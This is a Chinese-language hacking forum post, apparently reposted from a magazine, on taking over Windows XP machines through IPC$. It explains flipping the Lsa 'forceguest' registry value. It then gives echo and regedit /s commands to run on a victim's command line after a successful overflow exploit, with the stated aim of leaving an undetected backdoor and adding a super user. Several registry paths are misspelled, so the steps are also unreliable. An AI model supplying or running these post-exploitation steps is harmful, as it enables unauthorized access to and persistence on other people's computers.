xp下ipc$连接的问题

XP系统对于外来用户即使是admin也当成guest，所以我们就算得到对方的admin帐号密码也无法使用ipc$去连接对方，尽管提示命令成功到达。但是权限依旧是guest，因此无法使用一些基于ipc$连接的软件无法使用，而上传文件也是不可能的。在05.1期X档案中我看到一篇关于这方面的文章，转载过来，有兴趣的可以看看。
在XP的本地安全策略中有一项"网络访问：本地帐户的共享和安全模式仅来宾-本地用户以来宾身份验证"，看一下属性，还有一项"经典-本地用户以自己的身份验证。将他改成"经典…"后就可通过ipc$来连接xp。
通过修改注册表可以修改组策略，"仅来宾-本地用户以来宾身份验证"改成"经典…"注册表中[HKEY_LOCAL_MACHINE\SYSYTEM\ControlSet001\Conrtol\Lsa] 下的“forceguest"的值由"1"变成了"0"
呵呵… 到这而知道如何利用这个了吧？

嘿嘿…… 来一块研究……

其实这个利用主要是通过溢出成功后在对方DOS下修改注册表 然后留一个不被查杀的后门……… 我们肯定不可能跑到要黑的电脑上去给人家改注册表吧 嘿嘿

溢出成功后在对方命令行下修改注册表
c:\windows\system32>cd..
c:\windows>
c:\windows>echo windows registry
editor version 5.00>ipc1.reg
echo windows registry editor ver-
sion 5.00>ipc1.reg
c:\windows>echo [hkey_local_ma
chne\system\controlset001\control\lsa]>>
ipc1.reg
  echo [hkey_local_ma
chne\system\controlset001\control\lsa]>>
ipc1.reg
c:\windows>echo "forceguest"=dword:00000000>>ipc1.reg
  echo "forceguest"=dword:00000000>>ipc1.reg
c:\windows>regedit.exe /s ipc1.reg
regedit.exe /s ipc1.reg
你们试一下看看是不是可以成功
上面是建立一个reg文件ipc1.reg,然后用regedit.exe /s ipc1.reg导入到注册表中。
然后在建立一个超级用户。

恩 我介绍的是在DOS下 如何通过修改注册表来达到开IPC$的，你先溢出得到对方CMD权限后开这个建立不被查杀的后门